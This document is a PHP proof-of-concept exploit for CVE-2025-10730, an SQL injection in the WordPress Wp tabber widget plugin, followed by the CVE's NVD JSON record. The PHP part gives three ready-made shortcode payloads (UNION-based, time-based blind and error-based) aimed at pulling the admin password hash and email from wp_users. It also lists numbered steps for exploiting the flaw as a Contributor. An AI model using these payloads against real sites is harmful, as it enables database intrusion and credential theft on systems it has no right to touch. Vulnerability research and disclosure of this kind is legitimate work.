CVE-2025-10730

<?php /** * CVE-2025-10730 - WordPress Wp tabber widget SQL Injection PoC * Vulnerability: SQL Injection via 'wp-tabber-widget' shortcode * Affected: All versions up to and including 4.0 * Required: Contributor-level access or above */ // PoC: Malicious shortcode to be inserted into a WordPress post/page content // The vulnerable parameter is passed via shortcode attributes and concatenated // directly into SQL query without proper escaping or prepared statements. // Example 1: UNION-based SQL Injection to extract admin password hash $malicious_shortcode_1 = '[wp-tabber-widget id="1 UNION SELECT user_login, user_pass, user_email FROM wp_users WHERE ID=1-- "]'; // Example 2: Time-based blind SQL Injection $malicious_shortcode_2 = '[wp-tabber-widget id="1 AND (SELECT SLEEP(5))-- "]'; // Example 3: Error-based SQL Injection $malicious_shortcode_3 = '[wp-tabber-widget id="1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1)))-- "]'; // Exploitation Steps: // 1. Login as Contributor or higher level user // 2. Create a new Post or Page // 3. Insert one of the above malicious shortcodes into the content // 4. Submit for review or publish the post // 5. When the post is viewed, the injected SQL query executes // 6. Extract sensitive data from the database echo "Insert the following shortcode into a WordPress post:\n"; echo $malicious_shortcode_1 . "\n\n"; echo $malicious_shortcode_2 . "\n\n"; echo $malicious_shortcode_3 . "\n"; ?>

{"cve": {"id": "CVE-2025-10730", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:41.540", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Wp tabber widget plugin for WordPress is vulnerable to SQL Injection via the 'wp-tabber-widget' shortcode in all versions up to, and including, 4.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-tabber-widget/trunk/wp-tabber-widget.php#L51", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/317e17ac-74bd-44cd-8bae-aa893c588a46?source=cve", "source": "[email protected]"}]}}